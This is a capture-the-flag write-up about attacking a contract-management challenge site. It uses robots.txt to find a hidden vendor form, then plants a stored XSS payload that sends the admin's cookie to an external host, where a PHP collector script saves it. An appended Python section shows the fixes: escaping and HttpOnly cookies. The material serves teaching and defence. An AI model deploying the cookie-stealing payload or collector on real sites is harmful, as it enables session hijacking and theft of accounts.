Wallowing Wallabies provides enterprise contract management - we'd like to find out how easy it is to perform corporate espionage against them.
We've got a web page with no visible navigation or forms apart from the home page:
A quick look at robots.txt reveals some hidden content:
User-agent: *
Disallow: /deep-blue-sea/
Disallow: /deep-blue-sea/team/
# Yes, these are alphabet puns :)
Disallow: /deep-blue-sea/team/characters
Disallow: /deep-blue-sea/team/paragraphs
Disallow: /deep-blue-sea/team/lines
Disallow: /deep-blue-sea/team/runes
Disallow: /deep-blue-sea/team/vendors
The web page at /deep-blue-sea/team/vendors contains a form with two fields:
The text field was vulnerable to stored XSS and accepts a payload with simple JavaScript that steals the cookie:
<script src="bootstrap.min.js">
</script>
<script>document.write('<img src="http://sword.x10host.com/?c='+document.cookie+'"/>');
</script>
This payload was saved in a message sent to the site admin. At http://sword.x10host.com/ a simple PHP script saves the stolen cookie:
<?php
if (isset($_GET["c"])) {
$cookie = $_GET["c"];
file_put_contents("cookies.txt", $cookie);
}
After a couple of minutes someone "read" the message, and the cookies.txt file on sword.x10host.com contained the cookie:
green-mountains=eyJub25jZSI6ImUxNjgwMjcyYTcxNDE3MjMiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vdmVuZG9ycy4qJCIsImV4cGlyeSI6MTQ2MjAzMTg2OH0=|1462031865|d985a99f12846cd73da3b9b01b3b921fd15512e3
Refreshing the Wallowing Wallabies page with the stolen cookie revealed the flag:
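As an added, defender-side example (not part of the original write-up or of the challenge site), here is what closes both halves of this chain: HTML-escaping the vendors form field before it is rendered to the admin, and issuing the session cookie with HttpOnly so document.cookie can never expose it. A last helper decodes the green-mountains token from above into its three '|' fields to show what the token actually carries; the render and cookie-header functions are assumptions about how a fix could look, not the site's code.

```python
import base64
import html
import json
from http.cookies import SimpleCookie

# Constructed sample: the stored-XSS payload shape from the write-up, as it would
# arrive in the vendors form's text field.
STORED_PAYLOAD = ('<script>document.write(\'<img src="http://sword.x10host.com/?c=\''
                  '+document.cookie+\'"/>\');</script>')

# The cookie value captured in the write-up (copied from the page, not constructed).
GREEN_MOUNTAINS = ("eyJub25jZSI6ImUxNjgwMjcyYTcxNDE3MjMiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2Vh"
                   "L3RlYW0vdmVuZG9ycy4qJCIsImV4cGlyeSI6MTQ2MjAzMTg2OH0=|1462031865|"
                   "d985a99f12846cd73da3b9b01b3b921fd15512e3")

def render_message_unsafe(text):
    """The vulnerable pattern: untrusted text concatenated straight into HTML."""
    return "<div class='message'>" + text + "</div>"

def render_message(text):
    """Hardened version: HTML-escape the field before it reaches the admin page."""
    return "<div class='message'>" + html.escape(text, quote=True) + "</div>"

def has_tag(rendered, tag):
    """True if an element named `tag` survives into the rendered HTML."""
    return ("<" + tag) in rendered.lower()

def session_cookie_header(name, value, path):
    """Set-Cookie line with HttpOnly: the browser withholds the cookie from script,
    so even a successful injection cannot read it through document.cookie."""
    c = SimpleCookie()
    c[name] = value
    c[name]["httponly"] = True   # not visible to JavaScript
    c[name]["secure"] = True     # only sent over HTTPS
    c[name]["samesite"] = "Lax"  # not sent on cross-site subrequests such as <img>
    c[name]["path"] = path
    return c.output(header="Set-Cookie:")

def decode_green_mountains(raw):
    """Split the token into base64 JSON payload, issue timestamp and a 40-hex-char
    digest. Only the server can verify the digest; this just reports the fields."""
    payload_b64, issued, digest = raw.split("|")
    payload = json.loads(base64.b64decode(payload_b64))
    return {"payload": payload, "issued": int(issued), "digest": digest}
```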